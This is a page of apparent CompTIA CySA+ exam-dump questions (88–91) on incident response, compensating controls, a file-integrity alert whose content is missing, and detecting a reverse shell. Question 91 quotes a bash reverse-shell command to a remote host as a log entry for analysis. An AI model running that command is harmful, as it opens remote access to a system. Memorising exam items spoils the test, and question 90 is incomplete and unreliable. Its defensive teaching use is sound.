CompTIA CySA+ CS0-003 Updated Exam

Page: 22 / 24
Question 88

During an incident, some IoCs of possible ransomware contamination were found in a group of servers in a segment of the network. Which of the following steps should be taken next?

Options:

A. Isolation

B. Remediation

C. Reimaging

D. Preservation

Question 89

A company has a primary control in place to restrict access to a sensitive database. However, the company discovered an authentication vulnerability that could bypass this control. Which of the following is the best compensating control?

Options:

A. Running regular penetration tests to identify and address new vulnerabilities

B. Conducting regular security awareness training of employees to prevent social engineering attacks

C. Deploying an additional layer of access controls to verify authorized individuals

D. Implementing intrusion detection software to alert security teams of unauthorized access attempts

Question 90

A security analyst is reviewing the following alert that was triggered by FIM on a critical system:

Which of the following best describes the suspicious activity that is occurring?

Options:

A. A fake antivirus program was installed by the user.

B. A network drive was added to allow exfiltration of data.

C. A new program has been set to execute on system start.

D. The host firewall on 192.168.1.10 was disabled.

Question 91

A security analyst identified the following suspicious entry on the host-based IDS logs:

bash -i >& /dev/tcp/10.1.2.3/8080 0>&1

Which of the following shell scripts should the analyst use to most accurately confirm if the activity is ongoing?

Options:

A.

#!/bin/bash
nc 10.1.2.3 8080 -vv >/dev/null && echo "Malicious activity" || echo "OK"

B.

#!/bin/bash
ps -fea | grep 8080 >/dev/null && echo "Malicious activity" || echo "OK"

C.

#!/bin/bash
ls /opt/tcp/10.1.2.3/8080 >/dev/null && echo "Malicious activity" || echo "OK"

D.

#!/bin/bash
netstat -antp | grep 8080 >/dev/null && echo "Malicious activity" || echo "OK"

Exam Code: CS0-003
Exam Name: CompTIA CyberSecurity Analyst CySA+ Certification Exam
Last Update: Sep 12, 2024
Questions: 327